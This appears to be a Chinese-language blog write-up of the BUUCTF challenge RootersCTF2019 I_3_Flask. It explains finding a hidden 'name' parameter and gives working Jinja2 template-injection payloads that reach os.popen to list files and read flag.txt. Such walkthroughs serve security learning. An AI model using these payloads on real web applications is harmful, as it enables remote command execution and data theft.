Loading

[BUUCTF题解][RootersCTF2019]I_3_Flask

### 知识点

  • 参数爆破
  • SSTI-Flask

过程

做题先搜集(检查HTTP报文+查看初始页面HTML代码),初始页面什么都没有,但是通过参数爆破(凭感觉猜中了name,使用工具的话可以用https://github.com/s0md3v/Arjun)的话可以找到一个可用参数name

image-20220403195748296

页面各处都很明显的写着Flask字样,跟SSTI的可能性很大,测试下并验证成功。

image-20220403195915687

接下来测试下关键字,看有那些关键字被过滤,很好啥都没过滤,这里采用最好用的payload。

?name={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

image-20220403200825029

看到flag文件了,读取就能获得flag。

?name={{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}

image-20220403200917439

posted @ 2022-04-03 20:11  Article_kelp  阅读(164)  评论(0)    收藏  举报